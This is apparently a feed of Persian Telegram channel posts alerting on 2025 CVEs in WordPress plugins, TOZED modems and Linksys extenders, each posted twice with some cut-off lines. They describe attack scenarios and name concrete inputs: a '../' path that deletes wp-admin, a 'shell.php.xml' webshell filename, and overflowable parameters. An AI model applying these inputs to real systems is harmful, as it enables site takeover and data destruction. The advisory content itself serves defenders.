۴. در نهایت، مهاجم از طریق شل ایجاد شده، کنترل کامل دستگاه را در دست گرفته و میتواند اقدامات خرابکارانه خود را آغاز کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12673
🔴 Risk Level: CRITICAL (Score: 9.8)
🐞 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) با شناسه
این آسیبپذیری ناشی از عدم وجود اعتبارسنجی صحیح برای نوع فایلها در تابع
💥 تأثیر:
مهمترین و خطرناکترین پیامد این آسیبپذیری، امکان اجرای کد از راه دور (Remote Code Execution - RCE) است. یک مهاجم با بهرهبرداری موفق از این ضعف امنیتی میتواند کنترل کامل سرور را به دست آورد.
سایر تأثیرات احتمالی عبارتند از:
- سرقت اطلاعات حساس کاربران، پایگاه داده و فایلهای پیکربندی.
- نصب بدافزار، باجافزار یا استفاده از سرور برای حملات DDoS.
- تغییر چهره وبسایت (Defacement) و آسیب به اعتبار برند.
- ایجاد دسترسیهای پایدار (Backdoor) برای حملات آینده.
🎬 سناریو:
یک سناریوی حمله میتواند به شرح زیر باشد:
۱. مهاجم با ابزارهای اسکن خودکار، وبسایتهای وردپرسی را که از نسخه آسیبپذیر پلاگین `Flex QR Code Generator` استفاده میکنند، شناسایی میکند.
۲. سپس، یک فایل مخرب مانند یک وبشل (Web Shell) با پسوند
۳. مهاجم با ارسال یک درخواست دستکاریشده به تابع آسیبپذیر
۴. پس از آپلود موفقیتآمیز، مهاجم آدرس مستقیم فایل آپلود شده را در مرورگر خود باز میکند. سرور وب، کدهای PHP موجود در فایل را اجرا کرده و در نتیجه، مهاجم به یک رابط کاربری برای اجرای دستورات دلخواه روی سرور دسترسی پیدا میکند و کنترل کامل آن را در اختیار میگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
🐞 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) با شناسه
CVE-2025-12673 در پلاگین Flex QR Code Generator برای وردپرس شناسایی شده است. تمام نسخههای این پلاگین تا نسخه 1.2.6 (شامل این نسخه) تحت تأثیر این ضعف امنیتی قرار دارند.این آسیبپذیری ناشی از عدم وجود اعتبارسنجی صحیح برای نوع فایلها در تابع
update_qr_code() است. این نقص به مهاجمان احراز هویت نشده اجازه میدهد تا هر نوع فایلی (مانند یک وبشل مخرب) را بر روی سرور سایت آسیبپذیر آپلود کنند.💥 تأثیر:
مهمترین و خطرناکترین پیامد این آسیبپذیری، امکان اجرای کد از راه دور (Remote Code Execution - RCE) است. یک مهاجم با بهرهبرداری موفق از این ضعف امنیتی میتواند کنترل کامل سرور را به دست آورد.
سایر تأثیرات احتمالی عبارتند از:
- سرقت اطلاعات حساس کاربران، پایگاه داده و فایلهای پیکربندی.
- نصب بدافزار، باجافزار یا استفاده از سرور برای حملات DDoS.
- تغییر چهره وبسایت (Defacement) و آسیب به اعتبار برند.
- ایجاد دسترسیهای پایدار (Backdoor) برای حملات آینده.
🎬 سناریو:
یک سناریوی حمله میتواند به شرح زیر باشد:
۱. مهاجم با ابزارهای اسکن خودکار، وبسایتهای وردپرسی را که از نسخه آسیبپذیر پلاگین `Flex QR Code Generator` استفاده میکنند، شناسایی میکند.
۲. سپس، یک فایل مخرب مانند یک وبشل (Web Shell) با پسوند
.php آماده میکند. این فایل حاوی کدهایی است که به مهاجم اجازه اجرای دستورات روی سرور را میدهد.۳. مهاجم با ارسال یک درخواست دستکاریشده به تابع آسیبپذیر
update_qr_code()، فایل وبشل خود را بدون نیاز به هیچگونه نام کاربری یا رمز عبور، بر روی سرور آپلود میکند.۴. پس از آپلود موفقیتآمیز، مهاجم آدرس مستقیم فایل آپلود شده را در مرورگر خود باز میکند. سرور وب، کدهای PHP موجود در فایل را اجرا کرده و در نتیجه، مهاجم به یک رابط کاربری برای اجرای دستورات دلخواه روی سرور دسترسی پیدا میکند و کنترل کامل آن را در اختیار میگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13377
🔴 Risk Level: CRITICAL (Score: 9.6)
تحلیل آسیبپذیری | حذف پوشه دلخواه در افزونه 10Web Booster وردپرس
شناسه:
📄 توضیحات آسیبپذیری:
آسیبپذیری از نوع "حذف پوشه دلخواه" (Arbitrary Folder Deletion) در افزونه محبوب وردپرس با نام 10Web Booster – Website speed optimization, Cache & Page Speed optimizer شناسایی شده است.
این ضعف امنیتی در تمام نسخههای
این نقص به مهاجمان احرازهویت شده (حتی با کمترین سطح دسترسی مانند Subscriber) اجازه میدهد تا پوشههای دلخواه را روی سرور حذف کنند.
💥 تاثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به عواقب جدی برای وبسایت شود، از جمله:
🔻 از دست رفتن دادهها (Data Loss): مهاجم میتواند پوشههای حیاتی مانند
🔻 از کار افتادن سرویس (Denial of Service - DoS): با حذف پوشههای اصلی وردپرس مانند
🔻 آسیب به یکپارچگی سایت: حذف پوشههای مربوط به قالبها (themes) یا سایر افزونهها (plugins) میتواند ساختار و عملکرد سایت را مختل کند.
🎭 سناریو حمله:
یک مهاجم با سطح دسترسی Subscriber (مشترک) وارد وبسایت هدف میشود. سپس با ارسال یک درخواست دستکاریشده به سرور که تابع آسیبپذیر را فراخوانی میکند، از تکنیک پیمایش مسیر (Path Traversal) مانند
برای مثال، مهاجم میتواند درخواستی ارسال کند که باعث شود سرور مسیر
به دلیل عدم اعتبارسنجی صحیح، افزونه فریب خورده و به جای پوشه کش، پوشه حیاتی
---
✅ توصیههای امنیتی:
🔸 فوراً افزونه 10Web Booster را به آخرین نسخه منتشر شده بهروزرسانی کنید.
🔸 در صورتی که بهروزرسانی در دسترس نیست، این افزونه را تا زمان ارائه وصله امنیتی، غیرفعال و حذف نمایید.
🔸 همواره از فایلها و پایگاه داده وبسایت خود نسخه پشتیبان تهیه کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.6)
تحلیل آسیبپذیری | حذف پوشه دلخواه در افزونه 10Web Booster وردپرس
شناسه:
CVE-2025-13377📄 توضیحات آسیبپذیری:
آسیبپذیری از نوع "حذف پوشه دلخواه" (Arbitrary Folder Deletion) در افزونه محبوب وردپرس با نام 10Web Booster – Website speed optimization, Cache & Page Speed optimizer شناسایی شده است.
این ضعف امنیتی در تمام نسخههای
2.32.7 و پایینتر وجود دارد. مشکل اصلی از تابع get_cache_dir_for_page_from_url() نشأت میگیرد که در آن، اعتبارسنجی مسیر فایل به درستی انجام نمیشود.این نقص به مهاجمان احرازهویت شده (حتی با کمترین سطح دسترسی مانند Subscriber) اجازه میدهد تا پوشههای دلخواه را روی سرور حذف کنند.
💥 تاثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به عواقب جدی برای وبسایت شود، از جمله:
🔻 از دست رفتن دادهها (Data Loss): مهاجم میتواند پوشههای حیاتی مانند
wp-content/uploads که حاوی فایلهای رسانهای کاربران است را حذف کند.🔻 از کار افتادن سرویس (Denial of Service - DoS): با حذف پوشههای اصلی وردپرس مانند
wp-admin یا wp-includes، وبسایت به طور کامل از دسترس خارج شده و دچار اختلال در سرویسدهی میشود.🔻 آسیب به یکپارچگی سایت: حذف پوشههای مربوط به قالبها (themes) یا سایر افزونهها (plugins) میتواند ساختار و عملکرد سایت را مختل کند.
🎭 سناریو حمله:
یک مهاجم با سطح دسترسی Subscriber (مشترک) وارد وبسایت هدف میشود. سپس با ارسال یک درخواست دستکاریشده به سرور که تابع آسیبپذیر را فراخوانی میکند، از تکنیک پیمایش مسیر (Path Traversal) مانند
../ استفاده میکند تا مسیر یک پوشه حیاتی را هدف قرار دهد.برای مثال، مهاجم میتواند درخواستی ارسال کند که باعث شود سرور مسیر
/wp-content/plugins/10web-booster/cache/../../../../wp-admin/ را به عنوان مسیر حذف کش در نظر بگیرد.به دلیل عدم اعتبارسنجی صحیح، افزونه فریب خورده و به جای پوشه کش، پوشه حیاتی
wp-admin را به طور کامل حذف میکند. در نتیجه، پنل مدیریت وردپرس از دسترس خارج شده و سایت با اختلال جدی مواجه میشود.---
✅ توصیههای امنیتی:
🔸 فوراً افزونه 10Web Booster را به آخرین نسخه منتشر شده بهروزرسانی کنید.
🔸 در صورتی که بهروزرسانی در دسترس نیست، این افزونه را تا زمان ارائه وصله امنیتی، غیرفعال و حذف نمایید.
🔸 همواره از فایلها و پایگاه داده وبسایت خود نسخه پشتیبان تهیه کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12966
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری CVE-2025-12966
افزونه All-in-One Video Gallery وردپرس
📌 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) در افزونه
نقطه ضعف اصلی، عدم اعتبارسنجی صحیح نوع فایل (File Type Validation) در تابع
💥 تأثیر:
تأثیر اصلی این آسیبپذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. مهاجم با آپلود یک فایل مخرب (مانند یک وبشل - Web Shell) میتواند کنترل کامل سرور میزبان وبسایت را در دست بگیرد.
پیامدهای این حمله میتواند شامل موارد زیر باشد:
- سرقت اطلاعات حساس کاربران و پایگاه داده
- تغییر ظاهر سایت (Defacement)
- استفاده از سرور برای حملات بیشتر (مانند حملات DDoS یا ارسال هرزنامه)
- نصب بدافزار و استخراج ارز دیجیتال (Cryptojacking)
🕵️♂️ سناریوی حمله:
۱. مهاجم ابتدا یک حساب کاربری با سطح دسترسی "نویسنده" (Author) یا بالاتر در سایت وردپرسی هدف به دست میآورد. (این کار میتواند از طریق فیشینگ، حملات Brute-force یا سوءاستفاده از یک حساب کاربری قانونی انجام شود).
۲. سپس، یک فایل مخرب مانند یک وبشل با پسوند
۳. مهاجم با استفاده از قابلیت آسیبپذیر در افزونه، فایل
۴. پس از آپلود موفقیتآمیز، مهاجم آدرس مستقیم فایل آپلود شده را پیدا کرده و آن را در مرورگر خود باز میکند.
۵. با باز شدن آدرس، کدهای مخرب روی سرور اجرا شده و مهاجم به سرور دسترسی کامل پیدا میکند و میتواند هر دستوری را اجرا نماید.
---
💡 توصیههای امنیتی:
- بهروزرسانی فوری: در اسرع وقت افزونه All-in-One Video Gallery را به آخرین نسخه امن منتشر شده آپدیت کنید.
- مدیریت دسترسی: سطح دسترسی کاربران را بازبینی کرده و از اعطای دسترسیهای غیرضروری به کاربران نامعتبر خودداری کنید.
- استفاده از WAF: یک فایروال برنامه وب (Web Application Firewall) میتواند به شناسایی و مسدودسازی تلاشها برای آپلود فایلهای مخرب کمک کند.
- بررسی فایلها: سرور خود را برای یافتن هرگونه فایل مشکوک و ناشناس، بهویژه در پوشههای آپلود، اسکن کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری CVE-2025-12966
افزونه All-in-One Video Gallery وردپرس
📌 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع آپلود فایل دلخواه (Arbitrary File Upload) در افزونه
All-in-One Video Gallery برای وردپرس شناسایی شده است. این نقص امنیتی نسخههای 4.5.4 تا 4.5.7 این افزونه را تحت تأثیر قرار میدهد.نقطه ضعف اصلی، عدم اعتبارسنجی صحیح نوع فایل (File Type Validation) در تابع
resolve_import_directory() است. این حفره به مهاجمان احرازهویتشده با سطح دسترسی "نویسنده" (Author) و بالاتر اجازه میدهد تا فایلهای دلخواه خود، از جمله فایلهای اجرایی مخرب، را بر روی سرور سایت آسیبپذیر آپلود کنند.💥 تأثیر:
تأثیر اصلی این آسیبپذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. مهاجم با آپلود یک فایل مخرب (مانند یک وبشل - Web Shell) میتواند کنترل کامل سرور میزبان وبسایت را در دست بگیرد.
پیامدهای این حمله میتواند شامل موارد زیر باشد:
- سرقت اطلاعات حساس کاربران و پایگاه داده
- تغییر ظاهر سایت (Defacement)
- استفاده از سرور برای حملات بیشتر (مانند حملات DDoS یا ارسال هرزنامه)
- نصب بدافزار و استخراج ارز دیجیتال (Cryptojacking)
🕵️♂️ سناریوی حمله:
۱. مهاجم ابتدا یک حساب کاربری با سطح دسترسی "نویسنده" (Author) یا بالاتر در سایت وردپرسی هدف به دست میآورد. (این کار میتواند از طریق فیشینگ، حملات Brute-force یا سوءاستفاده از یک حساب کاربری قانونی انجام شود).
۲. سپس، یک فایل مخرب مانند یک وبشل با پسوند
.php آماده میکند. این فایل حاوی کدهایی برای اجرای دستورات روی سرور است.۳. مهاجم با استفاده از قابلیت آسیبپذیر در افزونه، فایل
shell.php خود را آپلود میکند. به دلیل نبود اعتبارسنجی، سیستم فایل مخرب را میپذیرد.۴. پس از آپلود موفقیتآمیز، مهاجم آدرس مستقیم فایل آپلود شده را پیدا کرده و آن را در مرورگر خود باز میکند.
۵. با باز شدن آدرس، کدهای مخرب روی سرور اجرا شده و مهاجم به سرور دسترسی کامل پیدا میکند و میتواند هر دستوری را اجرا نماید.
---
💡 توصیههای امنیتی:
- بهروزرسانی فوری: در اسرع وقت افزونه All-in-One Video Gallery را به آخرین نسخه امن منتشر شده آپدیت کنید.
- مدیریت دسترسی: سطح دسترسی کاربران را بازبینی کرده و از اعطای دسترسیهای غیرضروری به کاربران نامعتبر خودداری کنید.
- استفاده از WAF: یک فایروال برنامه وب (Web Application Firewall) میتواند به شناسایی و مسدودسازی تلاشها برای آپلود فایلهای مخرب کمک کند.
- بررسی فایلها: سرور خود را برای یافتن هرگونه فایل مشکوک و ناشناس، بهویژه در پوشههای آپلود، اسکن کنید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13065
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-13065
📝 توضیح آسیبپذیری:
افزونه
💥 تأثیرات و پیامدها:
مهمترین پیامد این آسیبپذیری، امکان اجرای کد از راه دور (RCE) است. این بدان معناست که مهاجم میتواند کنترل کامل وبسایت و سرور میزبان را به دست گیرد. سایر پیامدهای احتمالی عبارتند از: سرقت اطلاعات حساس کاربران و پایگاه داده، نصب بدافزار و دربهای پشتی (Backdoors) برای دسترسیهای آتی، و سوءاستفاده از سرور برای حملات دیگر مانند DDoS یا استخراج رمزارز.
👨💻 سناریوی حمله:
یک مهاجم با سطح دسترسی کاربری حداقل
مهاجم یک فایل مخرب (مانند یک وبشل به زبان PHP) ایجاد کرده و نام آن را با پسوند دوگانه ذخیره میکند؛ برای مثال:
سپس با استفاده از قابلیت ایمپورت در افزونه Starter Templates، اقدام به آپلود این فایل جعلی میکند.
به دلیل ضعف در اعتبارسنجی، افزونه فریب خورده و فایل را به عنوان یک فایل
در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده، کد مخرب خود را روی سرور اجرا کرده و به وبسایت و سرور تسلط کامل پیدا میکند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-13065
📝 توضیح آسیبپذیری:
افزونه
Starter Templates برای وردپرس در تمامی نسخهها تا نسخه 4.4.41 (شامل این نسخه) دارای آسیبپذیری از نوع آپلود فایل دلخواه (Arbitrary File Upload) است. علت اصلی این مشکل، اعتبارسنجی ناکافی نوع فایلهای WXR است. این نقص به مهاجم اجازه میدهد تا با استفاده از فایلهایی با پسوند دوگانه (مانند file.php.xml)، مکانیزمهای امنیتی را دور زده و فایل مخرب خود را به عنوان یک فایل WXR معتبر آپلود کند. این آسیبپذیری به مهاجمان احرازهویتشده با سطح دسترسی نویسنده (author) و بالاتر، امکان آپلود فایلهای دلخواه روی سرور سایت را میدهد که میتواند منجر به اجرای کد از راه دور (Remote Code Execution) شود.💥 تأثیرات و پیامدها:
مهمترین پیامد این آسیبپذیری، امکان اجرای کد از راه دور (RCE) است. این بدان معناست که مهاجم میتواند کنترل کامل وبسایت و سرور میزبان را به دست گیرد. سایر پیامدهای احتمالی عبارتند از: سرقت اطلاعات حساس کاربران و پایگاه داده، نصب بدافزار و دربهای پشتی (Backdoors) برای دسترسیهای آتی، و سوءاستفاده از سرور برای حملات دیگر مانند DDoS یا استخراج رمزارز.
👨💻 سناریوی حمله:
یک مهاجم با سطح دسترسی کاربری حداقل
author وارد پیشخوان وردپرس میشود.مهاجم یک فایل مخرب (مانند یک وبشل به زبان PHP) ایجاد کرده و نام آن را با پسوند دوگانه ذخیره میکند؛ برای مثال:
shell.php.xml.سپس با استفاده از قابلیت ایمپورت در افزونه Starter Templates، اقدام به آپلود این فایل جعلی میکند.
به دلیل ضعف در اعتبارسنجی، افزونه فریب خورده و فایل را به عنوان یک فایل
.xml معتبر شناسایی و روی سرور آپلود میکند.در نهایت، مهاجم با دسترسی مستقیم به آدرس فایل آپلود شده، کد مخرب خود را روی سرور اجرا کرده و به وبسایت و سرور تسلط کامل پیدا میکند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14126
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری:
🔎 شرح آسیبپذیری:
یک آسیبپذیری با شناسه
⚠️ تأثیر و پیامدها:
مهاجمی که به شبکه محلی (برای مثال، از طریق اتصال به Wi-Fi) دسترسی داشته باشد، میتواند با استفاده از این اعتبارنامههای افشاشده، به پنل مدیریتی مودم دسترسی کامل و در سطح ادمین پیدا کند. این سطح از دسترسی به مهاجم اجازه میدهد تا اقدامات مخرب زیر را انجام دهد:
- تغییر کامل تنظیمات مودم، از جمله رمز عبور Wi-Fi.
- شنود و نظارت بر کل ترافیک اینترنت کاربران متصل به شبکه.
- هدایت کاربران به وبسایتهای جعلی و فیشینگ از طریق تغییر تنظیمات DNS.
- استفاده از مودم به عنوان نقطهای برای اجرای حملات بیشتر علیه سایر دستگاههای موجود در شبکه.
🎯 سناریوی حمله:
۱. مهاجم ابتدا به شبکه Wi-Fi محلی متصل میشود (مثلاً با حدس زدن رمز عبور یا به عنوان یک کاربر مهمان).
۲. سپس آدرس پنل مدیریتی مودم (معمولاً
۳. با استفاده از نام کاربری و رمز عبور ثابتی که به صورت عمومی از طریق اکسپلویت منتشر شده است، به پنل مدیریتی وارد میشود.
۴. در این مرحله، مهاجم کنترل کامل بر روی مودم و ترافیک شبکه را در اختیار دارد و میتواند به راحتی اهداف مخرب خود را پیادهسازی کند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری:
CVE-2025-14126🔎 شرح آسیبپذیری:
یک آسیبپذیری با شناسه
CVE-2025-14126 در مودمهای TOZED مدلهای ZLT M30S و ZLT M30S PRO با نسخههای فریمور 1.47 و 3.09.06 شناسایی شده است. این ضعف امنیتی به دلیل وجود اعتبارنامههای از پیشتعیینشده (Hard-coded Credentials) در یکی از توابع بخش رابط وب (Web Interface) دستگاه رخ میدهد. این بدان معناست که یک نام کاربری و رمز عبور ثابت و غیرقابل تغییر در نرمافزار مودم کدنویسی شده است. حمله برای بهرهبرداری از این آسیبپذیری باید از داخل شبکه محلی (LAN) انجام شود. اکسپلویت مربوط به این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده به هشدارهای امنیتی پاسخی نداده است.⚠️ تأثیر و پیامدها:
مهاجمی که به شبکه محلی (برای مثال، از طریق اتصال به Wi-Fi) دسترسی داشته باشد، میتواند با استفاده از این اعتبارنامههای افشاشده، به پنل مدیریتی مودم دسترسی کامل و در سطح ادمین پیدا کند. این سطح از دسترسی به مهاجم اجازه میدهد تا اقدامات مخرب زیر را انجام دهد:
- تغییر کامل تنظیمات مودم، از جمله رمز عبور Wi-Fi.
- شنود و نظارت بر کل ترافیک اینترنت کاربران متصل به شبکه.
- هدایت کاربران به وبسایتهای جعلی و فیشینگ از طریق تغییر تنظیمات DNS.
- استفاده از مودم به عنوان نقطهای برای اجرای حملات بیشتر علیه سایر دستگاههای موجود در شبکه.
🎯 سناریوی حمله:
۱. مهاجم ابتدا به شبکه Wi-Fi محلی متصل میشود (مثلاً با حدس زدن رمز عبور یا به عنوان یک کاربر مهمان).
۲. سپس آدرس پنل مدیریتی مودم (معمولاً
192.168.1.1) را در مرورگر خود باز میکند.۳. با استفاده از نام کاربری و رمز عبور ثابتی که به صورت عمومی از طریق اکسپلویت منتشر شده است، به پنل مدیریتی وارد میشود.
۴. در این مرحله، مهاجم کنترل کامل بر روی مودم و ترافیک شبکه را در اختیار دارد و میتواند به راحتی اهداف مخرب خود را پیادهسازی کند.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14133
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14133
سرریز بافر حیاتی در توسعهدهندههای شبکه Linksys
---
شرح آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) در تعدادی از مدلهای توسعهدهنده شبکه (Range Extender) شرکت Linksys شناسایی شده است. این ضعف امنیتی در تابع
مهاجم میتواند با ارسال یک مقدار دستکاریشده در پارامتر
دستگاههای تحت تاثیر:
(در نسخههای فریمور مشخص شده در جزئیات CVE)
تاثیر:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به دو نتیجه خطرناک شود:
۱. اجرای کد از راه دور (RCE): مهاجم میتواند کنترل کامل دستگاه را به دست گرفته، به ترافیک شبکه داخلی شنود کند، بدافزار نصب کند یا از دستگاه به عنوان نقطهای برای حمله به سایر سیستمهای درون شبکه استفاده نماید.
۲. ممانعت از سرویس (DoS): مهاجم میتواند با ارسال یک درخواست مخرب، عملکرد دستگاه را مختل کرده و آن را از دسترس خارج کند.
با توجه به اینکه کد بهرهبرداری (Exploit) این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده نیز پاسخی به گزارش امنیتی نداده است، ریسک بهرهبرداری از آن بسیار بالا ارزیابی میشود.
سناریو:
یک مهاجم از راه دور، اینترنت را برای یافتن توسعهدهندههای Linksys آسیبپذیر اسکن میکند. پس از شناسایی یک هدف، مهاجم یک درخواست HTTP دستکاریشده به پنل وب دستگاه ارسال میکند.
این درخواست، حاوی یک رشته بسیار طولانی و مخرب در پارامتر
در نتیجه، پس از اتمام کار تابع، به جای بازگشت به روال عادی برنامه، پردازنده به کدی که مهاجم در درخواست خود جاسازی کرده است (Shellcode) پرش میکند. این فرآیند به مهاجم اجازه میدهد تا با سطح دسترسی سیستمعامل دستگاه (احتمالاً root)، دستورات دلخواه خود را اجرا کند و کنترل کامل آن را به دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14133
سرریز بافر حیاتی در توسعهدهندههای شبکه Linksys
---
شرح آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) در تعدادی از مدلهای توسعهدهنده شبکه (Range Extender) شرکت Linksys شناسایی شده است. این ضعف امنیتی در تابع
AP_get_wireless_clientlist_setClientsName واقع در فایل mod_form.so وجود دارد.مهاجم میتواند با ارسال یک مقدار دستکاریشده در پارامتر
clientsname_0، این آسیبپذیری را از راه دور و بدون نیاز به احرازهویت فعال کند.دستگاههای تحت تاثیر:
Linksys RE6500Linksys RE6250Linksys RE6300Linksys RE6350Linksys RE7000Linksys RE9000(در نسخههای فریمور مشخص شده در جزئیات CVE)
تاثیر:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به دو نتیجه خطرناک شود:
۱. اجرای کد از راه دور (RCE): مهاجم میتواند کنترل کامل دستگاه را به دست گرفته، به ترافیک شبکه داخلی شنود کند، بدافزار نصب کند یا از دستگاه به عنوان نقطهای برای حمله به سایر سیستمهای درون شبکه استفاده نماید.
۲. ممانعت از سرویس (DoS): مهاجم میتواند با ارسال یک درخواست مخرب، عملکرد دستگاه را مختل کرده و آن را از دسترس خارج کند.
با توجه به اینکه کد بهرهبرداری (Exploit) این آسیبپذیری به صورت عمومی منتشر شده و شرکت سازنده نیز پاسخی به گزارش امنیتی نداده است، ریسک بهرهبرداری از آن بسیار بالا ارزیابی میشود.
سناریو:
یک مهاجم از راه دور، اینترنت را برای یافتن توسعهدهندههای Linksys آسیبپذیر اسکن میکند. پس از شناسایی یک هدف، مهاجم یک درخواست HTTP دستکاریشده به پنل وب دستگاه ارسال میکند.
این درخواست، حاوی یک رشته بسیار طولانی و مخرب در پارامتر
clientsname_0 است که به تابع آسیبپذیر ارسال میشود. این داده ورودی، از فضای اختصاصدادهشده در پشته فراتر رفته و آدرس بازگشت تابع را بازنویسی میکند.در نتیجه، پس از اتمام کار تابع، به جای بازگشت به روال عادی برنامه، پردازنده به کدی که مهاجم در درخواست خود جاسازی کرده است (Shellcode) پرش میکند. این فرآیند به مهاجم اجازه میدهد تا با سطح دسترسی سیستمعامل دستگاه (احتمالاً root)، دستورات دلخواه خود را اجرا کند و کنترل کامل آن را به دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14134
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14134
---
📝 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه
این ضعف امنیتی در تابع
این حمله از راه دور (Remote) قابل اجرا بوده و اکسپلویت آن به صورت عمومی منتشر شده است. متأسفانه، شرکت سازنده به گزارش اولیه این آسیبپذیری هیچ پاسخی نداده است.
دستگاههای تحت تأثیر:
• Linksys RE6500, RE6250, RE6300, RE6350, RE7000, RE9000
نسخههای آسیبپذیر:
• 1.0.013.001, 1.0.04.001, 1.0.04.002, 1.1.05.003, 1.2.07.001
💥 تأثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به اجرای کد دلخواه از راه دور (Remote Code Execution - RCE) بر روی دستگاه هدف شود.
این به معنای آن است که مهاجم میتواند کنترل کامل دستگاه را در دست گرفته، تنظیمات آن را تغییر دهد، ترافیک شبکه را شنود کند یا از دستگاه به عنوان نقطهای برای حمله به سایر دستگاههای موجود در شبکه داخلی استفاده نماید. همچنین، امکان از کار انداختن دستگاه (Denial of Service - DoS) نیز وجود دارد.
🎭 سناریوی حمله:
یک مهاجم از راه دور، با ارسال یک درخواست HTTP دستکاریشده به پنل مدیریتی دستگاه، پارامتر
این عمل باعث سرریز شدن بافر در پشته حافظه (Stack) شده و به مهاجم اجازه میدهد تا آدرس بازگشت تابع را بازنویسی کرده و کنترل اجرای برنامه را به کد مخرب تزریقشده توسط خود منتقل کند. در نتیجه، مهاجم میتواند دستورات دلخواه خود را با سطح دسترسی دستگاه آسیبپذیر اجرا نماید.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14134
---
📝 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع سرریز بافر مبتنی بر پشته (Stack-based Buffer Overflow) با شناسه
CVE-2025-14134 در برخی از توسعهدهندههای شبکه (Range Extender) شرکت Linksys شناسایی شده است.این ضعف امنیتی در تابع
RE2000v2Repeater_get_wireless_clientlist_setClientsName واقع در فایل mod_form.so وجود دارد. مهاجم میتواند با دستکاری و ارسال مقادیر مخرب به آرگومان clientsname_0، این آسیبپذیری را فعالسازی کند.این حمله از راه دور (Remote) قابل اجرا بوده و اکسپلویت آن به صورت عمومی منتشر شده است. متأسفانه، شرکت سازنده به گزارش اولیه این آسیبپذیری هیچ پاسخی نداده است.
دستگاههای تحت تأثیر:
• Linksys RE6500, RE6250, RE6300, RE6350, RE7000, RE9000
نسخههای آسیبپذیر:
• 1.0.013.001, 1.0.04.001, 1.0.04.002, 1.1.05.003, 1.2.07.001
💥 تأثیرات:
بهرهبرداری موفق از این آسیبپذیری میتواند منجر به اجرای کد دلخواه از راه دور (Remote Code Execution - RCE) بر روی دستگاه هدف شود.
این به معنای آن است که مهاجم میتواند کنترل کامل دستگاه را در دست گرفته، تنظیمات آن را تغییر دهد، ترافیک شبکه را شنود کند یا از دستگاه به عنوان نقطهای برای حمله به سایر دستگاههای موجود در شبکه داخلی استفاده نماید. همچنین، امکان از کار انداختن دستگاه (Denial of Service - DoS) نیز وجود دارد.
